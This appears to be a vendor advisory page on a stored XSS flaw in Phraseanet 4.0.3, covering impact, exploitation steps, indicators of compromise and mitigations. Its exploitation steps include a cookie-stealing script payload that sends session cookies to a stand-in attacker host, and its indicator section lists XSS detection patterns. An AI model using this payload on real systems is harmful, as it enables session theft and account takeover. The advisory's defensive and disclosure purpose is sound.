CVE-2018-25157: 
PHP vulnerability analysis and mitigation

Overview

CVE-2018-25157 is a stored cross-site scripting (XSS) vulnerability in Phraseanet 4.0.3, a digital asset management platform. Authenticated attackers can inject malicious scripts by uploading documents with crafted file names containing embedded SVG scripts, which execute in the browser when the file is viewed by other users. The vulnerability was published to the GitHub Advisory Database on February 11, 2026, and affects the phraseanet/phraseanet Composer package at version 4.0.3. It carries a CVSS v3.1 base score of 6.4 (Medium) and a CVSS v4.0 base score of 5.1 (Medium) (GitHub Advisory).

Technical details

The vulnerability is classified as CWE-79 (Improper Neutralization of Input During Web Page Generation — Cross-site Scripting), specifically a stored XSS variant. Phraseanet 4.0.3 fails to sanitize or validate file names during the document upload process, allowing an authenticated user to upload a file whose name contains embedded SVG script content. When another user subsequently views or browses the uploaded file, the malicious script executes in their browser context. A public exploit is referenced on Exploit-DB (EDB-46935), indicating that technical details and a proof-of-concept have been publicly disclosed (GitHub Advisory).

Impact

Successful exploitation allows an attacker to execute arbitrary JavaScript in the browser of any user who views the maliciously named file, enabling session cookie theft, credential harvesting, and unauthorized redirection to attacker-controlled sites. Because the payload is stored server-side and triggered on file view, it can affect multiple victims without further attacker interaction. The scope is changed (S:C in CVSS), meaning the impact extends beyond the vulnerable component to the browsers of other authenticated users, with low confidentiality and integrity impact and no availability impact (GitHub Advisory).

Exploitability

A public exploit for this vulnerability is available on Exploit-DB (EDB-46935), indicating the vulnerability has been weaponized to at least a proof-of-concept level (GitHub Advisory). The EPSS score is approximately 0.024% (11th percentile), suggesting a low but non-zero probability of active exploitation in the near term. No evidence of in-the-wild exploitation, threat actor attribution, or CISA KEV catalog listing has been identified for this CVE.

Exploitation steps

  1. Authenticate: Obtain valid credentials for a Phraseanet 4.0.3 instance with document upload privileges (e.g., a standard user account).
  2. Craft malicious file name: Prepare a file (e.g., an SVG file) whose file name contains an embedded XSS payload, such as <script>document.location='https://attacker.com/steal?c='+document.cookie</script>.svg or a similarly crafted name that Phraseanet stores without sanitization.
  3. Upload the file: Use the Phraseanet document upload functionality to submit the crafted file to the platform, causing the malicious file name to be stored in the application database.
  4. Wait for victim interaction: When another authenticated user browses the document library or views the uploaded file, the stored script in the file name is rendered unsanitized in the browser, triggering execution.
  5. Harvest results: The executed script performs the attacker's objective — e.g., exfiltrating the victim's session cookie to an attacker-controlled server, enabling session hijacking or account takeover (GitHub Advisory).

Indicators of compromise

  • Network: Outbound HTTP requests from victim browsers to unexpected external domains (e.g., attacker-controlled cookie-harvesting endpoints) originating from Phraseanet page loads.
  • Logs: Web server access logs showing requests to document listing or file view pages immediately followed by requests to external URLs not associated with normal application behavior; unusual Referer headers pointing to Phraseanet pages in external server logs.
  • File System: Presence of uploaded files with anomalous names containing HTML/SVG/script tags or URL-encoded equivalents in the Phraseanet upload directory.
  • Application: Phraseanet database entries for document records with file names containing <script>, <svg>, onerror=, javascript:, or similar XSS indicators.

Mitigation and workarounds

As of the advisory publication date (February 11, 2026), no patched version of phraseanet/phraseanet has been identified — the GitHub Advisory lists "None" for patched versions (GitHub Advisory). Organizations should apply strict input validation and output encoding for file names in the document upload workflow as a compensating control. Additionally, restricting upload privileges to trusted users only, implementing a Content Security Policy (CSP) to limit script execution, and monitoring uploaded file names for script-like content can reduce risk until an official patch is released.

Additional resources


Source: This report was generated using AI

Related PHP vulnerabilities:

CVE ID

Severity

Score

Technologies

Component name

CISA KEV exploit

Has fix

Published date

CVE-2026-55224HIGH8.7
  • PHP logoPHP
  • mineadmin/mineadmin
NoYesSep 30, 2026
CVE-2026-103111HIGH7.6
  • MariaDB Server logoMariaDB Server
  • mariadb11.8-server
NoYesSep 30, 2026
GHSA-3q6v-r5mr-hxv8HIGH7.5
  • PHP logoPHP
  • league/commonmark
NoYesSep 30, 2026
GHSA-97jj-33gv-5xf9MEDIUM6.1
  • PHP logoPHP
  • league/commonmark
NoYesSep 30, 2026
CVE-2026-104181MEDIUM5.4
  • PHP logoPHP
  • filament/filament
NoYesOct 01, 2026

Free Vulnerability Assessment

Benchmark your Cloud Security Posture

Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.

Request assessment

Get a personalized demo

Ready to see Wiz in action?

"Best User Experience I have ever seen, provides full visibility to cloud workloads."
David EstlickCISO
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
Adam FletcherChief Security Officer
"We know that if Wiz identifies something as critical, it actually is."
Greg PoniatowskiHead of Threat and Vulnerability Management